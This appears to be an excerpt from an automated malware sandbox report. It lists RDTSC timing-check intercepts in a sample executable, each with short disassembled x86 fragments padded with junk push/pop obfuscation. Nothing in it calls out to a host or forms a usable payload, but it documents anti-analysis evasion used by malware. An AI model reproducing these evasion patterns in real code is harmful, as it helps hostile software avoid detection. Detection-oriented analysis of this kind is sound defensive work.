                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F950A6 second address: F95101 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jne 00007F022CCCFB09h 0x00000010 push 00000000h 0x00000012 pushad 0x00000013 mov dword ptr [ebp+12455CC3h], eax 0x00000019 jo 00007F022CCCFB0Ch 0x0000001f jnp 00007F022CCCFB06h 0x00000025 popad 0x00000026 push 00000000h 0x00000028 jmp 00007F022CCCFB13h 0x0000002d xchg eax, esi 0x0000002e jbe 00007F022CCCFB17h 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jmp 00007F022CCCFB0Dh 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f push ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F960F2 second address: F960F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F960F9 second address: F9610B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F022CCCFB06h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9610B second address: F96119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F022C800536h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F96F77 second address: F97005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D3194h], eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F022CCCFB08h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a ja 00007F022CCCFB0Ch 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F022CCCFB08h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push eax 0x0000004d pushad 0x0000004e mov bx, 5DB0h 0x00000052 mov cx, EFD1h 0x00000056 popad 0x00000057 pop ebx 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F022CCCFB18h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9620A second address: F96217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F962D3 second address: F962E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F022CCCFB06h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F97248 second address: F9724E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9724E second address: F97252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F98205 second address: F9820B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F99395 second address: F9939A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9B3AD second address: F9B3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9B3B1 second address: F9B40B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F022CCCFB08h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D22D3h], ebx 0x00000029 mov bl, ACh 0x0000002b push 00000000h 0x0000002d mov bh, cl 0x0000002f or edi, dword ptr [ebp+122D3958h] 0x00000035 push 00000000h 0x00000037 mov ebx, dword ptr [ebp+122D3459h] 0x0000003d push eax 0x0000003e pushad 0x0000003f push ecx 0x00000040 jmp 00007F022CCCFB13h 0x00000045 pop ecx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9C47C second address: F9C4FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c add ebx, 428D38DAh 0x00000012 mov ebx, dword ptr [ebp+122D2B18h] 0x00000018 popad 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c clc 0x0000001d jnl 00007F022C80053Ch 0x00000023 mov dword ptr [ebp+122D2674h], edi 0x00000029 popad 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F022C800538h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 jp 00007F022C800536h 0x0000004c xchg eax, esi 0x0000004d pushad 0x0000004e push ecx 0x0000004f jmp 00007F022C80053Dh 0x00000054 pop ecx 0x00000055 jnl 00007F022C80053Ch 0x0000005b popad 0x0000005c push eax 0x0000005d pushad 0x0000005e push esi 0x0000005f jnp 00007F022C800536h 0x00000065 pop esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push esi 0x00000069 pop esi 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9D4BC second address: F9D541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edi 0x0000000c jo 00007F022CCCFB08h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F022CCCFB08h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D1E54h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F022CCCFB08h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 mov bl, 05h 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 jo 00007F022CCCFB08h 0x0000005e push eax 0x0000005f pop eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jne 00007F022CCCFB06h 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9D541 second address: F9D558 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f je 00007F022C80053Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9E617 second address: F9E61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9E61D second address: F9E690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jne 00007F022C800536h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 add bx, 564Ah 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F022C800538h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 push 00000000h 0x00000036 call 00007F022C800549h 0x0000003b or ebx, 10B42DE9h 0x00000041 pop ebx 0x00000042 xchg eax, esi 0x00000043 jmp 00007F022C80053Ch 0x00000048 push eax 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9E690 second address: F9E694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9D6FD second address: F9D703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9C659 second address: F9C65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9B684 second address: F9B688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9B688 second address: F9B68E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9B68E second address: F9B692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9D703 second address: F9D7A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F022CCCFB08h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov ebx, esi 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov bl, 22h 0x00000038 mov eax, dword ptr [ebp+122D0229h] 0x0000003e jmp 00007F022CCCFB0Fh 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F022CCCFB08h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 00000017h 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f or di, B226h 0x00000064 jg 00007F022CCCFB06h 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push ecx 0x0000006e jmp 00007F022CCCFB0Eh 0x00000073 pop ecx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9D7A3 second address: F9D7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022C80053Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9C65D second address: F9C673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022CCCFB12h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9C673 second address: F9C677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9C677 second address: F9C706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or edi, dword ptr [ebp+122D266Ch] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 xor dword ptr [ebp+122D2868h], edi 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 jmp 00007F022CCCFB0Bh 0x00000028 mov eax, dword ptr [ebp+122D0149h] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F022CCCFB08h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 sbb di, 6F80h 0x0000004d push FFFFFFFFh 0x0000004f mov ebx, 014DB897h 0x00000054 nop 0x00000055 jmp 00007F022CCCFB12h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d je 00007F022CCCFB14h 0x00000063 jmp 00007F022CCCFB0Eh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9E80E second address: F9E828 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9F7B4 second address: F9F822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F022CCCFB06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F022CCCFB18h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jmp 00007F022CCCFB12h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov dword ptr [ebp+122D3594h], esi 0x0000002f mov eax, dword ptr [ebp+122D07F9h] 0x00000035 sub dword ptr [ebp+124651F6h], ecx 0x0000003b push FFFFFFFFh 0x0000003d mov dword ptr [ebp+122D29CCh], edi 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jo 00007F022CCCFB06h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9F822 second address: F9F828 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FA1D3A second address: FA1D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FA1D44 second address: FA1D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FA7D17 second address: FA7D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FA7D1B second address: FA7D2C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F022C800536h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FAD9ED second address: FAD9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FAD9F1 second address: FADA00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FADA00 second address: FADA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FADD06 second address: FADD1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F022C80053Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB2E98 second address: FB2EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 jo 00007F022CCCFB27h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F022CCCFB0Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB2EB5 second address: FB2ED4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jc 00007F022C800536h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB81E7 second address: FB81F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F022CCCFB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB6EDF second address: FB6EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB6EE5 second address: FB6EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB7926 second address: FB792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB8049 second address: FB8053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F022CCCFB06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB8053 second address: FB8059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB8059 second address: FB8060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FB8060 second address: FB80A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F022C800536h 0x0000000a popad 0x0000000b jmp 00007F022C800549h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F022C800549h 0x0000001a jne 00007F022C800536h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F475FB second address: F47617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB18h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F47617 second address: F47627 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007F022C800536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F47627 second address: F4762D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F4762D second address: F47636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F47636 second address: F47684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F022CCCFB06h 0x0000000a jne 00007F022CCCFB06h 0x00000010 jmp 00007F022CCCFB10h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F022CCCFB18h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 jng 00007F022CCCFB06h 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push edi 0x0000002d pop edi 0x0000002e push edi 0x0000002f pop edi 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F47684 second address: F47690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F022C800536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F47690 second address: F476C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB18h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F022CCCFB14h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBDD1D second address: FBDD21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBDD21 second address: FBDD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBDE72 second address: FBDE8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F022C800543h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBDFD3 second address: FBDFF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBDFF2 second address: FBE001 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F022C800536h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBE300 second address: FBE32A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F022CCCFB16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBE32A second address: FBE334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBE47C second address: FBE497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB12h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBE497 second address: FBE49B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBE795 second address: FBE79B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBE79B second address: FBE7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBEAA7 second address: FBEABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F022CCCFB06h 0x00000009 jp 00007F022CCCFB06h 0x0000000f js 00007F022CCCFB06h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBEABE second address: FBEAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBEAD1 second address: FBEAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
